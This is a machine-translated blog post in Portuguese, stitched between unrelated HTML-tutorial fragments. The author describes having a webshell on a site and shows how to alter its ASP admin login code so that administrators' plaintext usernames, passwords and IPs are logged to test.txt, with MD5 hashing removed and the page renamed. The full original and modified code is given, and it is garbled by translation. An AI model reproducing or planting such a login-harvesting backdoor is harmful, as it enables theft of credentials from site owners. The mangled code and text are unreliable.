Recomendado: coleção de redação de código html O HTML é a linguagem de marcação de hipertexto (HypertextMarkuplanguage), também conhecida como linguagem da web, é necessária para entendê -la nas páginas da web. Embora existam muitas ferramentas para fazer páginas da web agora, como DreamWvear, FrontPage etc., você pode realmente fazer lindas páginas da web sem entender esses códigos. . . Como o conteúdo HTML é numeroso, poucas pessoas estão dispostas a escrever código para fazer páginas da web (eficiência inefficial), e a maioria delas usa
Em uma verificação de segurança, eu realmente consegui a webshell, mas também preciso que a assistente social tenha outras informações em seu endereço de e -mail, então tenho que conhecer seus hábitos.
O banco de dados foi baixado, mas a senha do MD5 não pôde ser descriptografada. Infelizmente, parece que você só precisa gravar a senha da conta do administrador de login!
Salve o problema de se livrar do problema!
Essa senha é realmente importante, mas não é importante.
Porque muitas pessoas gostam de usar a mesma senha. Até detectores de segurança como eu são inevitavelmente o hábito de usar a mesma senha da conta.
Primeiro, confira seu código de login de segundo plano
<%
Dim login
Definir login = new Adlogin
Login.execute
Classe adlogin
Excommcls privados
Sub -Class_initialize privado
Definir CommCls = Novos Commoncls
Excommcls.isipallow
Excommcls.checkInstall
Excommcls.getconfigcache (*)
Final sub
Sub -Class_terminado privado
Definir excommcls = nada
Final sub
Sub -executo público
Ação escura
Ação = solicitação (ação)
Selecione Ação do caso
Casol de checklogin
CheckLogin
Loginout do caso
Loginout
Caso mais
Loginf
Final Selecione
Final sub
Sub -checklogin privado
Dim Adname, ADPWD, CheckCode
Adname = excommcls.g (Trim (solicitação (adname)))
ADPWD = MD5 (TRIM (solicitação (ADPWD)))
Checkcode = excommcls.g (solicitação (código de seleção))
Se TRIM (CheckCode) <> Sessão (EcceckCode) e Application (Sn & IscheckCode) = Sim Então então
Excommcls.showmsg Código de verificação está incorreto! , Application (SN & Blogurl) & Admin_Login.asp
Sub
Final se
Se Trim (adname) = CSTR (Application (Sn & Adname)) e Trim (ADPWD) = CSTR (Application (Sn & ADPWD)) então
Response.Cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.Cookies (MD5 (SN)) (ADPWD) = ADPWD
sessão (adlogin) = md5 (sn)
Excommcls.getconfigcache (*)
Excommcls.getclasscache ()
Response.Redirect (Application (SN & BlogUrl) & Admin_Index.asp)
Outro
Excommcls.showmsg ou senha está errada, aplicativo (SN & BlogUrl) & admin_login.asp
Final se
Final sub
Sub Loginout privado
Response.Cookies (MD5 (SN)) (ADNAME) =
Response.Cookies (MD5 (SN)) (ADPWD) =
session.abandon ()
Excommcls.showmsg registrado com sucesso, Application (SN & Blogurl) & Index.asp
Final sub
Sub Loginf privado
%>
Veja o seguinte código
Adname = excommcls.g (Trim (solicitação (adname)))
ADPWD = MD5 (TRIM (solicitação (ADPWD)))
--- O significado é muito simples, então não explica explicitamente aqui. Depende principalmente do MD5. Se a senha for criptografada usando o MD5, a senha que gravamos será inútil e ainda é MD5. então
Por isso, pensei em um método de pesca. Sua interface de login original é
Sub -checklogin privado
Dim Adname, ADPWD, CheckCode, StrLogText, IP, FF
Adname = excommcls.g (Trim (solicitação (adname)))
ADPWD = (TRIM (solicitação (ADPWD)))
Checkcode = excommcls.g (solicitação (código de seleção))
strLogfile = test.txt
IP = solicitação (IP)
StrLogText = strLogText & adname & ---- & adpwd & ----- ip: & ip & (remote_host)
set f = server.createObject (script.filesystemobject)
SET FF = F.OPENTEXTFILE (Server.mapath (.) &/& strLogfile, 8, true, 0)
FF.WriteLine (Chr (13)+Chr (10) e StrLogText)
ff.close
Definir FF = nada
set f = nada
Se TRIM (CheckCode) <> Sessão (EcceckCode) e Application (Sn & IscheckCode) = Sim Então então
Excommcls.showmsg Código de verificação está incorreto! , Application (SN & Blogurl) & Admin_1ogin.asp
Sub
Final se
Se Trim (adname) = CSTR (Application (Sn & Adname)) e Trim (ADPWD) = CSTR (Application (Sn & ADPWD)) então
Response.Cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.Cookies ((SN)) (ADPWD) = ADPWD
sessão (adlogin) = md5 (sn)
Excommcls.getconfigcache (*)
Excommcls.getclasscache ()
Response.Redirect (Application (Sn & Blogurl) & Admin_1ogin.asp)
Outro
Excommcls.showmsg ou senha está errada, aplicativo (SN & BlogUrl) & admin_1ogin.asp
Final se
Final sub
Veja ou não,
a = A página de login original foi substituída por uma página de phishing
b = A página de login original (admin_login.asp) é modificada para admin_1ogin.asp
Por que?
ORIGINAL: ADPWD = MD5 (TRIM (solicitação (ADPWD)))
Response.Cookies (MD5 (SN)) (ADPWD) = ADPWD
Rever
ADPWD = (TRIM (solicitação (ADPWD)))
Response.Cookies ((SN)) (ADPWD) = ADPWD
Remova o MD5. . Este método confuso tem sido usado há muito tempo! . .
Sem conteúdo técnico. Por favor, não ria de mim! A senha será gravada no teste.txt
Compartilhar: Destaques dos elementos da cabeça Os documentos HTML consistem em duas partes: cabeça (parte do tema, geralmente invisível) e corpo (a parte do corpo, visível no navegador). Com a popularidade dos editores da Web visual, como FrontPage e Dreamweaver (DW), não é mais um sonho fazer uma página profissional da Web sem entender o HTML. No entanto, essas ferramentas de criação da página inicial não podem ser usadas